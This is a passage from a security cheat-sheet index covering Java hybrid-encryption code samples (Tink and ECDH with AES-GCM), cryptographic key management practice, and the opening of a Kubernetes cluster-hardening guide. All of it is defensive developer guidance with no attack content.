every so often in order to\n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello, Bob!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: alicesmith@example.com\";\n\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\nvar cipherText = alice.encrypt(bobPublicKey, plaintext, metadata);\nSystem.out.println(\"Ciphertext being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(cipherText, metadata);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello, Alice!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata2 = \"Sender: bobjones@example.com\";\n\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\nvar cipherText2 = bob.encrypt(alicePublicKey, plaintext2, metadata2);\nSystem.out.println(\"Ciphertext being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(cipherText2, metadata2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n\nprivate static KeysetHandle getKeysetHandle(String filename) throws Exception\n{\nreturn TinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(filename)), UTF_8), InsecureSecretKeyAccess.get());\n}\n}\nclass HybridSimple {\n\nprivate KeysetHandle privateKey;\nprivate KeysetHandle publicKey;\n\n\npublic HybridSimple(KeysetHandle privateKeyIn, KeysetHandle publicKeyIn) throws Exception {\nprivateKey = privateKeyIn;\npublicKey = publicKeyIn;\n}\n\npublic KeysetHandle getPublicKey() {\nreturn publicKey;\n}\n\npublic byte[] encrypt(KeysetHandle partnerPublicKey, String message, String metadata) throws Exception {\n\nHybridEncrypt encryptor = partnerPublicKey.getPrimitive(HybridEncrypt.class);\n\n// return the encrypted value\nreturn encryptor.encrypt(message.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\npublic String decrypt(byte[] ciphertext, String metadata) throws Exception {\n\nHybridDecrypt decryptor = privateKey.getPrimitive(HybridDecrypt.class);\n\n// return the encrypted value\nreturn new String(decryptor.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-built-in-jcajce-classes","title":"Asymmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built JCA/JCE classes but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using Eliptic Curve/Diffie Helman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need the transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE hybrid encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.*;\nimport java.security.*;\nimport java.security.spec.*;\nimport java.util.Arrays;\n\n// ECDHSimpleTest\nclass Main {\npublic static void main(String[] args) throws Exception {\n\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nKey alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nKey bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to \n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello\"; //, Bob!\";\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\n\nvar retPair = alice.encrypt(bobPublicKey, plaintext);\nvar nonce = retPair.getKey();\nvar cipherText = retPair.getValue();\n\nSystem.out.println(\"Both cipherText and nonce being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText) + \" \" + Base64.getEncoder().encodeToString(nonce));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(alicePublicKey, cipherText, nonce);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello\"; //, Alice!\";\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nvar retPair2 = bob.encrypt(alicePublicKey, plaintext2);\nvar nonce2 = retPair2.getKey();\nvar cipherText2 = retPair2.getValue();\nSystem.out.println(\"Both cipherText2 and nonce2 being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2) + \" \" + Base64.getEncoder().encodeToString(nonce2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(bobPublicKey, cipherText2, nonce2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\nclass ECDHSimple {\nprivate KeyPair keyPair;\n\npublic class AesKeyNonce {\npublic SecretKey Key;\npublic byte[] Nonce;\n}\n\npublic ECDHSimple() throws Exception {\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"EC\");\nECGenParameterSpec ecSpec = new ECGenParameterSpec(\"secp256r1\"); // Using secp256r1 curve\nkeyPairGenerator.initialize(ecSpec);\nkeyPair = keyPairGenerator.generateKeyPair();\n}\n\npublic Key getPublicKey() {\nreturn keyPair.getPublic();\n}\n\npublic AbstractMap.SimpleEntry<byte[], byte[]> encrypt(Key partnerPublicKey, String message) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey);\n\n// return the encrypted value\nreturn new AbstractMap.SimpleEntry<>(\naesParams.Nonce,\nAesGcmSimple.encrypt(message, aesParams.Nonce, aesParams.Key)\n);\n}\npublic String decrypt(Key partnerPublicKey, byte[] ciphertext, byte[] nonce) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey, nonce);\n\n// return the decrypted value\nreturn AesGcmSimple.decrypt(ciphertext, aesParams.Nonce, aesParams.Key);\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey, byte[] nonce) throws Exception {\n\n// Derive the secret based on this side's private key and the other side's public key \nKeyAgreement keyAgreement = KeyAgreement.getInstance(\"ECDH\");\nkeyAgreement.init(keyPair.getPrivate());\nkeyAgreement.doPhase(partnerPublicKey, true);\nbyte[] secret = keyAgreement.generateSecret();\n\nAesKeyNonce aesKeyNonce = new AesKeyNonce();\n\n// Copy first 32 bytes as the key\nbyte[] key = Arrays.copyOfRange(secret, 0, (AesGcmSimple.KEY_SIZE / 8));\naesKeyNonce.Key = new SecretKeySpec(key, 0, key.length, \"AES\");\n\n// Passed in nonce will be used.\naesKeyNonce.Nonce = nonce;\nreturn aesKeyNonce;\n\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey) throws Exception {\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\n// Therefore this is not generated from the shared secret\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\nreturn generateAESParams(partnerPublicKey, nonce);\n\n}\n}\n
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html","title":"Key Management Cheat Sheet","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Key Management Cheat Sheet provides developers with guidance for implementation of cryptographic key management within an application in a secure manner. It is important to document and harmonize rules and practices for:

  1. key life cycle management (generation, distribution, destruction)
  2. key compromise, recovery and zeroization
  3. key storage
  4. key agreement
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#general-guidelines-and-considerations","title":"General Guidelines and Considerations","text":"

Formulate a plan for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.

Identify the cryptographic and key management requirements for your application and map all components that process or store cryptographic key material.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-selection","title":"Key Selection","text":"

Selection of the cryptographic and key management algorithms to use within a given application should begin with an understanding of the objectives of the application.

For example, if the application is required to store data securely, then the developer should select an algorithm suite that supports the objective of data at rest protection security. Applications that are required to transmit and receive data would select an algorithm suite that supports the objective of data in transit protection.

We have provided recommendations on the selection of crypto suites within an application based on application and security objectives. Application developers oftentimes begin the development of crypto and key management capabilities by examining what is available in a library.

However, an analysis of the real needs of the application should be conducted to determine the optimal key management approach. Begin by understanding the security objectives of the application which will then drive the selection of cryptographic protocols that are best suited. For example, the application may require:

  1. Confidentiality of data at rest and confidentiality of data in transit.
  2. Authenticity of the end device.
  3. Authenticity of data origin.
  4. Integrity of data in transit.
  5. Keys to create the data encryption keys.

Once the understanding of the security needs of the application is achieved, developers can determine what protocols and algorithms are required. Once the protocols and algorithms are understood, you can begin to define the different types of keys that will support the application's objectives.

There are a diverse set of key types and certificates to consider, for example:

  1. Encryption: Symmetric encryption keys, Asymmetric encryption keys (public and private).
  2. Authentication of End Devices: Pre-shared symmetric keys, Trusted certificates, Trust Anchors.
  3. Data Origin Authentication: HMAC.
  4. Integrity Protection: Message Authentication Codes (MACs).
  5. Key Encryption Keys.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#algorithms-and-protocols","title":"Algorithms and Protocols","text":"

According to NIST SP 800-57 Part 1, many algorithms and schemes that provide a security service use a hash function as a component of the algorithm.

Hash functions can be found in digital signature algorithms (FIPS186), Keyed-Hash Message Authentication Codes (HMAC) (FIPS198), key-derivation functions/methods (NIST Special Publications (SP) 800-56A, 800-56B, 800-56C and 800-108), and random number generators (NIST SP 800-90A). Approved hash functions are defined in FIPS180.

NIST SP 800-57 Part 1 recognizes three basic classes of approved cryptographic algorithms: hash functions, symmetric- key algorithms and asymmetric-key algorithms. The classes are defined by the number of cryptographic keys that are used in conjunction with the algorithm.

The NSA released a report, Commercial National Security Algorithm Suite 2.0 which lists the cryptographic algorithms that are expected to be remain strong even with advances in quantum computing.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-hash-functions","title":"Cryptographic hash functions","text":"

Cryptographic hash functions do not require keys. Hash functions generate a relatively small digest (hash value) from a (possibly) large input in a way that is fundamentally difficult to reverse (i.e., it is hard to find an input that will produce a given output). Hash functions are used as building blocks for key management, for example,

  1. To provide data authentication and integrity services (Section 4.2.3) \u2013 the hash function is used with a key to generate a message authentication code.
  2. To compress messages for digital signature generation and verification (Section 4.2.4).
  3. To derive keys in key-establishment algorithms (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#symmetric-key-algorithms","title":"Symmetric-key algorithms","text":"

Symmetric-key algorithms (sometimes known as secret-key algorithms) transform data in a way that is fundamentally difficult to undo without knowledge of a secret key. The key is \"symmetric\" because the same key is used for a cryptographic operation and its inverse (e.g., encryption and decryption).

Symmetric keys are often known by more than one entity; however, the key shall not be disclosed to entities that are not authorized access to the data protected by that algorithm and key. Symmetric key algorithms are used, for example,

  1. To provide data confidentiality (Section 4.2.2); the same key is used to encrypt and decrypt data.
  2. To provide authentication and integrity services (Section 4.2.3) in the form of Message Authentication Codes (MACs); the same key is used to generate the MAC and to validate it. MACs normally employ either a symmetric key-encryption algorithm or a cryptographic hash function as their cryptographic primitive.
  3. As part of the key-establishment process (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#asymmetric-key-algorithms","title":"Asymmetric-key algorithms","text":"

Asymmetric-key algorithms, commonly known as public-key algorithms, use two related keys (i.e., a key pair) to perform their functions: a public key and a private key. The public key may be known by anyone; the private key should be under the sole control of the entity that \"owns\" the key pair. Even though the public and private keys of a key pair are related, knowledge of the public key does not reveal the private key. Asymmetric algorithms are used, for example,

  1. To compute digital signatures (Section 4.2.4).
  2. To establish cryptographic keying material (Section 4.2.5).
  3. To generate random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#message-authentication-codes-macs","title":"Message Authentication Codes (MACs)","text":"

Message Authentication Codes (MACs) provide data authentication and integrity. A MAC is a cryptographic checksum on the data that is used in order to provide assurance that the data has not changed and that the MAC was computed by the expected entity.

Although message integrity is often provided using non-cryptographic techniques known as error detection codes, these codes can be altered by an adversary to effect an action to the adversary's benefit. The use of an approved cryptographic mechanism, such as a MAC, can alleviate this problem.

In addition, the MAC can provide a recipient with assurance that the originator of the data is a key holder (i.e., an entity authorized to have the key). MACs are often used to authenticate the originator to the recipient when only those two parties share the MAC key.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#digital-signatures","title":"Digital Signatures","text":"

Digital signatures are used to provide authentication, integrity and non-repudiation. Digital signatures are used in conjunction with hash functions and are computed on data of any length (up to a limit that is determined by the hash function).

FIPS186 specifies algorithms that are approved for the computation of digital signatures.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-encryption-keys","title":"Key Encryption Keys","text":"

Symmetric key-wrapping keys are used to encrypt other keys using symmetric-key algorithms. Key-wrapping keys are also known as key encrypting keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-strength","title":"Key Strength","text":"

Review NIST SP 800-57 (Recommendation for Key Management) for recommended guidelines on key strength for specific algorithm implementations. Also, consider these best practices:

  1. Establish what the application's minimum computational resistance to attack should be. Understanding the minimum computational resistance to attack should take into consideration the sophistication of your adversaries, how long data needs to be protected, where data is stored and if it is exposed. Identifying the computational resistance to attack will inform engineers as to the minimum length of the cryptographic key required to protect data over the life of that data. Consult NIST SP 800-131a for additional guidance on determining the appropriate key lengths for the algorithm of choice.
  2. When encrypting keys for storage or distribution, always encrypt a cryptographic key with another key of equal or greater cryptographic strength.
  3. When moving to Elliptic Curve-based algorithms, choose a key length that meets or exceeds the comparative strength of other algorithms in use within your system. Refer to NIST SP 800-57 Table 2.
  4. Formulate a strategy for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#memory-management-considerations","title":"Memory Management Considerations","text":"

Keys stored in memory for a long time can become \"burned in\". This can be mitigated by splitting the key into components that are frequently updated. NIST SP 800.57).

Loss or corruption of the memory media on which keys and/or certificates are stored, and recovery planning, according to NIST SP 800.57.

Plan for the recovery from possible corruption of the memory media necessary for key or certificate generation, registration, and/or distribution systems, subsystems, or components as recommended in NIST SP 800.57.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#perfect-forward-secrecy","title":"Perfect Forward Secrecy","text":"

Ephemeral keys can provide perfect forward secrecy protection, which means a compromise of the server's long term signing key does not compromise the confidentiality of past sessions. Refer to TLS cheat sheet.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-usage","title":"Key Usage","text":"

According to NIST, in general, a single key should be used for only one purpose (e.g., encryption, authentication, key wrapping, random number generation, or digital signatures).

There are several reasons for this:

  1. The use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.
  2. Limiting the use of a key limits the damage that could be done if the key is compromised.
  3. Some uses of keys interfere with each other. For example, the length of time the key may be required for each use and purpose. Retention requirements of the data may differ for different data types.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-module-topics","title":"Cryptographic Module Topics","text":"

According to NIST SP800-133, cryptographic modules are the set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary to provide protection of the keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","title":"Key Management Lifecycle Best Practices","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#generation","title":"Generation","text":"

Cryptographic keys shall be generated within cryptographic module with at least a FIPS 140-2 compliance. For explanatory purposes, consider the cryptographic module in which a key is generated to be the key-generating module.

Any random value required by the key-generating module shall be generated within that module; that is, the Random Bit Generator that generates the random value shall be implemented within cryptographic module with at least a FIPS 140-2 compliance that generates the key.

Hardware cryptographic modules are preferred over software cryptographic modules for protection.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#distribution","title":"Distribution","text":"

The generated keys shall be transported (when necessary) using secure channels and shall be used by their associated cryptographic algorithm within at least a FIPS 140-2 compliant cryptographic modules. For additional detail for the recommendations in this section refer to NIST Special Paper 800-133.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#storage","title":"Storage","text":"
  1. Developers must understand where cryptographic keys are stored within the application. Understand what memory devices the keys are stored on.
  2. Keys must be protected on both volatile and persistent memory, ideally processed within secure cryptographic modules.
  3. Keys should never be stored in plaintext format.
  4. Ensure all keys are stored in cryptographic vault, such as a hardware security module (HSM) or isolated cryptographic service.
  5. If you are planning on storing keys in offline devices/databases, then encrypt the keys using Key Encryption Keys (KEKs) prior to the export of the key material. KEK length (and algorithm) should be equivalent to or greater in strength than the keys being protected.
  6. Ensure that keys have integrity protections applied while in storage (consider dual purpose algorithms that support encryption and Message Code Authentication (MAC)).
  7. Ensure that standard application level code never reads or uses cryptographic keys in any way and use key management libraries.
  8. Ensure that keys and cryptographic operation is done inside the sealed vault.
  9. All work should be done in the vault (such as key access, encryption, decryption, signing, etc).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#escrow-and-backup","title":"Escrow and Backup","text":"

Data that has been encrypted with lost cryptographic keys will never be recovered. Therefore, it is essential that the application incorporate a secure key backup capability, especially for applications that support data at rest encryption for long-term data stores.

When backing up keys, ensure that the database that is used to store the keys is encrypted using at least a FIPS 140-2 validated module. It is sometimes useful to escrow key material for use in investigations and for re-provisioning of key material to users in the event that the key is lost or corrupted.

Never escrow keys used for performing digital signatures, but consider the need to escrow keys that support encryption. Oftentimes, escrow can be performed by the Certificate Authority (CA) or key management system that provisions certificates and keys, however in some instances separate APIs must be implemented to allow the system to perform the escrow for the application.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#accountability-and-audit","title":"Accountability and Audit","text":"

Accountability involves the identification of those that have access to, or control of, cryptographic keys throughout their lifecycles. Accountability can be an effective tool to help prevent key compromises and to reduce the impact of compromises once they are detected.

Although it is preferred that no humans are able to view keys, as a minimum, the key management system should account for all individuals who are able to view plaintext cryptographic keys.

In addition, more sophisticated key-management systems may account for all individuals authorized to access or control any cryptographic keys, whether in plaintext or ciphertext form.

Accountability provides three significant advantages:

  1. It aids in the determination of when the compromise could have occurred and what individuals could have been involved.
  2. It tends to protect against compromise, because individuals with access to the key know that their access to the key is known.
  3. It is very useful in recovering from a detected key compromise to know where the key was used and what data or other keys were protected by the compromised key.

Certain principles have been found to be useful in enforcing the accountability of cryptographic keys. These principles might not apply to all systems or all types of keys.

Some of the principles that apply to long-term keys controlled by humans include:

  1. Uniquely identifying keys.
  2. Identifying the key user.
  3. Identifying the dates and times of key use, along with the data that is protected.
  4. Identifying other keys that are protected by a symmetric or private key.

Two types of audit should be performed on key management systems:

  1. The security plan and the procedures that are developed to support the plan should be periodically audited to ensure that they continue to support the Key Management Policy (NIST SP 800-57 Part 2).
  2. The protective mechanisms employed should be periodically reassessed with respect to the level of security that they provide and are expected to provide in the future, and that the mechanisms correctly and effectively support the appropriate policies.

New technology developments and attacks should be taken into consideration. On a more frequent basis, the actions of the humans that use, operate and maintain the system should be reviewed to verify that the humans continue to follow established security procedures.

Strong cryptographic systems can be compromised by lax and inappropriate human actions. Highly unusual events should be noted and reviewed as possible indicators of attempted attacks on the system.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-compromise-and-recovery","title":"Key Compromise and Recovery","text":"

The compromise of a key has the following implications:

  1. In general, the unauthorized disclosure of a key used to provide confidentiality protection (i.e., via encryption) means that all information encrypted by that key could be exposed or known by unauthorized entities. The disclosure of a Certificate of Authorities's private signature key means that an adversary can create fraudulent certificates and Certificate Revocation Lists (CRLs).
  2. A compromise of the integrity of a key means that the key is incorrect - either that the key has been modified (either deliberately or accidentally), or that another key has been substituted; this includes a deletion (non-availability) of the key. The substitution or modification of a key used to provide integrity calls into question the integrity of all information protected by the key. This information could have been provided by, or changed by, an unauthorized entity that knows the key. The substitution of a public or secret key that will be used (at a later time) to encrypt data could allow an unauthorized entity (who knows the decryption key) to decrypt data that was encrypted using the encryption key.
  3. A compromise of a key's usage or application association means that the key could be used for the wrong purpose (e.g., for key establishment instead of digital signatures) or for the wrong application, and could result in the compromise of information protected by the key.
  4. A compromise of a key's association with the owner or other entity means that the identity of the other entity cannot be assured (i.e., one does not know who the other entity really is) or that information cannot be processed correctly (e.g., decrypted with the correct key).
  5. A compromise of a key's association with other information means that there is no association at all, or the association is with the wrong \"information\". This could cause the cryptographic services to fail, information to be lost, or the security of the information to be compromised. Certain protective measures may be taken in order to minimize the likelihood or consequences of a key compromise. Similar affect as ransomware, except that you can't pay the ransom and get the key back.

The following procedures are usually involved:

  1. Limiting the amount of time a symmetric or private key is in plaintext form.
  2. Preventing humans from viewing plaintext symmetric and private keys.
  3. Restricting plaintext symmetric and private keys to physically protected containers. This includes key generators, key-transport devices, key loaders, cryptographic modules, and key-storage devices.
  4. Using integrity checks to ensure that the integrity of a key or its association with other data has not been compromised. For example, keys may be wrapped (i.e., encrypted) in such a manner that unauthorized modifications to the wrapping or to the associations will be detected.
  5. Employing key confirmation (see NIST SP 800-57 Part 1 Section 4.2.5.5) to help ensure that the proper key was, in fact, established.
  6. Establishing an accountability system that keeps track of each access to symmetric and private keys in plaintext form.
  7. Providing a cryptographic integrity check on the key (e.g., using a MAC or a digital signature).
  8. The use of trusted timestamps for signed data. i. Destroying keys as soon as they are no longer needed.
  9. Creating a compromise-recovery plan, especially in the case of a CA compromise.

A compromise-recovery plan is essential for restoring cryptographic security services in the event of a key compromise. A compromise-recovery plan shall be documented and easily accessible.

The compromise-recovery plan should contain:

  1. The identification and contact info of the personnel to notify.
  2. The identification and contact info of the personnel to perform the recovery actions.
  3. The re-key method.
  4. An inventory of all cryptographic keys and their use (e.g., the location of all certificates in a system).
  5. The education of all appropriate personnel on the recovery procedures.
  6. An identification and contact info of all personnel needed to support the recovery procedures.
  7. Policies that key-revocation checking be enforced (to minimize the effect of a compromise).
  8. The monitoring of the re-keying operations (to ensure that all required operations are performed for all affected keys).
  9. Any other recovery procedures, which may include:
    1. Physical inspection of the equipment.
    2. Identification of all information that may be compromised as a result of the incident.
    3. Identification of all signatures that may be invalid, due to the compromise of a signing key.
    4. Distribution of new keying material, if required.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#trust-stores","title":"Trust Stores","text":"
  1. Design controls to secure the trust store against injection of third-party root certificates. The access controls are managed and enforced on an entity and application basis.
  2. Implement integrity controls on objects stored in the trust store.
  3. Do not allow for export of keys held within the trust store without authentication and authorization.
  4. Setup strict policies and procedures for exporting key material from applications to network applications and other components.
  5. Implement a secure process for updating the trust store.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-key-management-libraries","title":"Cryptographic Key Management Libraries","text":"

Use only reputable crypto libraries that are well maintained and updated, as well as tested and validated by third-party organizations (e.g., NIST/FIPS).

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#documentation","title":"Documentation","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html","title":"Kubernetes Security Cheat Sheet","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes","title":"Kubernetes","text":"

Kubernetes is an open source container orchestration engine for automating deployment, scaling, and management of containerized applications. The open source project is hosted by the Cloud Native Computing Foundation (CNCF).

When you deploy Kubernetes, you get a cluster. A Kubernetes cluster consists of a set of worker machines, called nodes that run containerized applications. The control plane manages the worker nodes and the Pods in the cluster.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-plane-components","title":"Control Plane Components","text":"

The control plane's components make global decisions about the cluster, as well as detecting and responding to cluster events. It consists of components such as kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager

Component Description kube-apiserver kube-apiserver exposes the Kubernetes API. The API server is the front end for the Kubernetes control plane. etcd etcd is a consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data. kube-scheduler kube-scheduler watches for newly created Pods with no assigned node, and selects a node for them to run on. kube-controller-manager kube-controller-manager runs controller processes. Logically, each controller is a separate process, but to reduce complexity, they are all compiled into a single binary and run in a single process. cloud-controller-manager The cloud controller manager lets you link your cluster into your cloud provider's API, and separates out the components that interact with that cloud platform from components that just interact with your cluster."},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-components","title":"Node Components","text":"

Node components run on every node, maintaining running pods and providing the Kubernetes runtime environment. It consists of components such as kubelet, kube-proxy and container runtime.

Component Description kubelet kubelet is an agent that runs on each node in the cluster. It makes sure that containers are running in a Pod kube-proxy kube-proxy is a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept Container runtime The container runtime is the software that is responsible for running containers.

This cheatsheet provides a starting point for securing Kubernetes cluster. It is divided into the following categories:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-hosts","title":"Securing Kubernetes hosts","text":"

There are several options available to deploy Kubernetes: on bare metal, on-premise, and in the public cloud (custom Kubernetes build on virtual machines OR use a managed service). Kubernetes was designed to be highly portable and customers can easily switch between these installations, migrating their workloads.

All of this potential customisation of Kubernetes means it can be designed to fit a large variety of scenarios; however, this is also its greatest weakness when it comes to security. Kubernetes is designed out of the box to be customizable and users must turn on certain functionality to secure their cluster. This means that the engineers responsible for deploying the Kubernetes platform need to know about all the potential attack vectors and vulnerabilities poor configuration can lead to.

It is recommended to harden the underlying hosts by installing the latest version of operating system, hardening the operating system, implement necessary patch management and configuration management system, implementing essential firewall rules and undertake specific security measures depending on the datacenter environment.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-version","title":"Kubernetes Version","text":"

It has become impossible to track all potential attack vectors. This fact is unfortunate as there is nothing more vital than to be aware and on top of potential threats. The best defense is to make sure that you are running the latest available version of Kubernetes.

The Kubernetes project maintains release branches for the most recent three minor releases and it backports the applicable fixes, including security fixes, to those three release branches, depending on severity and feasibility. Patch releases are cut from those branches at a regular cadence, plus additional urgent releases, when required. Hence it is always recommended to upgrade the Kubernetes cluster to the latest available stable version. It is recommended to refer to the version skew policy for further details https://kubernetes.io/docs/setup/release/version-skew-policy/.

There are several techniques such as rolling updates, and node pool migrations that allow you to complete an update with minimal disruption and downtime.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-components","title":"Securing Kubernetes components","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-network-access-to-sensitive-ports","title":"Control network access to sensitive ports","text":"

Kubernetes clusters usually listen on a range of well-defined and distinctive ports which makes it easier identify the clusters and attack them. Hence it is highly recommended to configure authentication and authorization on the cluster and cluster nodes.

Here is an overview of the default ports used in Kubernetes. Make sure that your network blocks access to ports and consider limiting access to the Kubernetes API server except from trusted networks.

Master node(s):

Protocol Port Range Purpose TCP 6443- Kubernetes API Server TCP 2379-2380 etcd server client API TCP 10250 Kubelet API TCP 10251 kube-scheduler TCP 10252 kube-controller-manager TCP 10255 Read-Only Kubelet API

Worker nodes:

Protocol Port Range Purpose TCP 10250 Kubelet API TCP 10255 Read-Only Kubelet API TCP 30000-32767 NodePort Services"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limit-direct-access-to-kubernetes-nodes","title":"Limit Direct Access to Kubernetes Nodes","text":"

You should limit SSH access to Kubernetes nodes, reducing the risk for unauthorized access to host resource. Instead you should ask users to use \"kubectl exec\", which will provide direct access to the container environment without the ability to access the host.

You can use Kubernetes Authorization Plugins to further control user access to resources. This allows defining fine-grained-access control rules for specific namespace, containers and operations.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubernetes-api","title":"Controlling access to the Kubernetes API","text":"

The Kubernetes platform is controlled using API requests and as such is the first line of defense against attackers. Controlling who has access and what actions they are allowed to perform is the primary concern. For more information, refer to the documentation at https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-transport-layer-security","title":"Use Transport Layer Security","text":"

Communication in the cluster between services should be handled using TLS, encrypting all traffic by default. This, however, is often overlooked with the thought being that the cluster is secure and there is no need to provide encryption in transit within the cluster.

Advances in network technology, such as the service mesh, have led to the creation of products like LinkerD and Istio which can enable TLS by default while providing extra telemetry information on transactions between services.

Kubernetes expects that all API communication in the cluster is encrypted by default with TLS, and the majority of installation methods will allow the necessary certificates to be created and distributed to the cluster components. Note that some components and installation methods may enable local ports over HTTP and administrators should familiarize themselves with the settings of each component to identify potentially unsecured traffic.

To learn more on usage of TLS in Kubernetes cluster, refer to the documentation at https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/#1-tls-everywhere.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authentication","title":"API Authentication","text":"

Kubernetes provides a number of in-built mechanisms for API server authentication, however these are likely only suitable for non-production or small clusters.

The recommended approach for larger or production clusters, is to use an external authentication method:

In addition to choosing the appropriate authentication system, API access should be considered privileged and use Multi-Factor Authentication (MFA) for all user access.

For more information, consult Kubernetes authentication reference document at https://kubernetes.io/docs/reference/access-authn-authz/authentication

